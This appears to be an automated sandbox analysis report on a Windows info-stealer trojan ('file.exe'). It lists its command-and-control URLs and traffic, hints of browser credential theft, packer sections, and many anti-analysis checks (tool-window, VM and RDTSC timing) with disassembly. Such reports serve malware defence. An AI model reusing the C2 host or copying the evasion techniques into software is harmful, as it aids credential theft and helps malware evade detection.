          Source: file.exe, 00000000.00000002.2173989776.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172326210.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172028798.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiC
          Source: file.exe, 00000000.00000002.2174291854.0000000001084000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/c
          Source: file.exe, 00000000.00000003.2151922850.0000000005801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api
          Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2

          System Summary

          Source: file.exe | Static PE information: section name:
          Source: file.exe | Static PE information: section name: .idata
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0103496C
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFB939
          Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exe | Static PE information: Section: ZLIB complexity 0.998114224137931
          Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
          Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: file.exe, 00000000.00000003.2081782731.00000000057F8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exe | ReversingLabs: Detection: 39%
          Source: file.exe | String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696426836); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837); user_pref("app.update.lastUpdateTime.xpi-signatur
          Source: file.exe | String found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696426836); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837); user_pref("app.update.lastUpdateTime.xpi-signature-v
          Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: file.exe | String found in binary or memory: i;RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeV
          Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
          Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
          Source: file.exe | Static file information: File size 3038208 > 1048576
          Source: file.exe | Static PE information: Raw size of hlkscldd is bigger than: 0x100000 < 0x2ba200

          Data Obfuscation

          Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W;hlkscldd:EW;rdxnvvje:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hlkscldd:EW;rdxnvvje:EW;.taggant:EW;
          Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
          Source: file.exe | Static PE information: real checksum: 0x2ed202 should be: 0x2f5a70
          Source: file.exe | Static PE information: section name:
          Source: file.exe | Static PE information: section name: .idata
          Source: file.exe | Static PE information: section name: hlkscldd
          Source: file.exe | Static PE information: section name: rdxnvvje
          Source: file.exe | Static PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0107CBFA push cs; ret | 0_3_0107CC07
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_01081821 push cs; retf | 0_3_0108183E
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0107C090 push ds; ret | 0_3_0107C093
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0107CCE1 push ss; ret | 0_3_0107CCF9
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCB68 push 6800FFCBh; retf | 0_3_00FFCB6D
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCF68 push 6800FFCFh; iretd | 0_3_00FFCF6D
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCB64 pushad ; retf | 0_3_00FFCB65
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCF64 pushad ; iretd | 0_3_00FFCF65
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCB60 pushad ; retf | 0_3_00FFCB61
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCF60 pushad ; iretd | 0_3_00FFCF61
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCB54 push eax; retf | 0_3_00FFCB55
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCF54 push eax; iretd | 0_3_00FFCF55
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCB50 push eax; retf | 0_3_00FFCB51
          Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00FFCF50 push eax; iretd | 0_3_00FFCF51
          Source: file.exe | Static PE information: section name: entropy: 7.981720932479415

          Boot Survival

          Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
          Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
          Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
          Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
          Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
          Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
          Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
          Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B29AE second address: 9B29B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50AB second address: 9B50B5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1FDD1C143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50B5 second address: 9B50C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50C2 second address: 9B50CF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1FDD1C1436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50CF second address: 9B50DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edi 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B50DF second address: 9B50E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5508 second address: 9B551B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B570C second address: 9B5710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5710 second address: 9B5726 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1FDD1C1206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F1FDD1C1206h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5726 second address: 9B572C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C0B second address: 9B5C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C11 second address: 9B5C1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C1F second address: 9B5C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C120Bh 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C2F second address: 9B5C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5C35 second address: 9B5C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5CA8 second address: 9B5CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5DAA second address: 9B5DCD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1FDD1C1216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B68B1 second address: 9B68C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F1FDD1C1436h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B68C5 second address: 9B68C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B68C9 second address: 9B68D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DB9 second address: 9B8DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007F1FDD1C1218h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DCA second address: 9B8DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DCE second address: 9B8DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8DD2 second address: 9B8E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov si, F7F2h 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F1FDD1C1438h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jl 00007F1FDD1C143Ah 0x0000002d mov si, 7995h 0x00000031 push 00000000h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jmp 00007F1FDD1C1443h 0x0000003e popad 0x0000003f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B98B5 second address: 9B98EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1218h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F1FDD1C121Ah 0x00000012 jmp 00007F1FDD1C1214h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B95EB second address: 9B95EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B95EF second address: 9B95F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA2DD second address: 9BA2F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA2F1 second address: 9BA2F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA2F7 second address: 9BA327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F1FDD1C143Dh 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBA64 second address: 9BBA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBA68 second address: 9BBA76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFC5D second address: 9BFC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0DCE second address: 9C0E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 ja 00007F1FDD1C144Ah 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jmp 00007F1FDD1C1441h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 cmc 0x00000023 mov eax, dword ptr [ebp+122D09B5h] 0x00000029 mov dword ptr [ebp+122D2733h], esi 0x0000002f jmp 00007F1FDD1C143Bh 0x00000034 push FFFFFFFFh 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F1FDD1C1438h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D1C83h], ebx 0x00000056 nop 0x00000057 push eax 0x00000058 push edx 0x00000059 jp 00007F1FDD1C1438h 0x0000005f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1CA0 second address: 9C1CB0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F1FDD1C120Eh 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0E57 second address: 9C0E5C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3A2E second address: 9C3A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007F1FDD1C1210h 0x0000000c pop edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0E5C second address: 9C0E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1FDD1C1445h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0E7D second address: 9C0E87 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1FDD1C1206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C0E87 second address: 9C0E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C429E second address: 9C42A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C506E second address: 9C50EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F1FDD1C1442h 0x0000000c jmp 00007F1FDD1C143Ch 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F1FDD1C1438h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f or bh, FFFFFFDFh 0x00000032 mov edi, 439F4220h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007F1FDD1C1438h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 or bx, B661h 0x00000058 xchg eax, esi 0x00000059 jmp 00007F1FDD1C1441h 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6159 second address: 9C615D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C615D second address: 9C6163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6163 second address: 9C619A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1FDD1C1216h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jbe 00007F1FDD1C1208h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1FDD1C120Dh 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C710E second address: 9C713A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jne 00007F1FDD1C144Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C713A second address: 9C713E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C72C3 second address: 9C7351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jp 00007F1FDD1C143Eh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F1FDD1C1438h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1245C783h], esi 0x0000002d add ebx, dword ptr [ebp+122D3A95h] 0x00000033 push dword ptr fs:[00000000h] 0x0000003a sub dword ptr [ebp+122D2733h], ecx 0x00000040 mov ebx, dword ptr [ebp+122D32D0h] 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007F1FDD1C1438h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000018h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 mov eax, dword ptr [ebp+122D115Dh] 0x0000006d push FFFFFFFFh 0x0000006f xor dword ptr [ebp+122D333Dh], edx 0x00000075 nop 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a pop eax 0x0000007b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C83DB second address: 9C83F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F1FDD1C1206h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F1FDD1C120Ch 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C83F6 second address: 9C8497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1447h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D1CE5h], eax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 or edi, dword ptr [ebp+122D2547h] 0x0000001d mov dword ptr [ebp+122D1DBEh], ebx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F1FDD1C1438h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 call 00007F1FDD1C1444h 0x00000049 call 00007F1FDD1C143Bh 0x0000004e jbe 00007F1FDD1C1436h 0x00000054 pop edi 0x00000055 pop edi 0x00000056 mov eax, dword ptr [ebp+122D012Dh] 0x0000005c mov edi, dword ptr [ebp+122D3A0Dh] 0x00000062 push FFFFFFFFh 0x00000064 mov dword ptr [ebp+122D333Dh], edx 0x0000006a nop 0x0000006b pushad 0x0000006c push edi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA0B9 second address: 9CA0D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1FDD1C1212h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9380 second address: 9C9392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F1FDD1C1438h 0x00000010 rdtsc
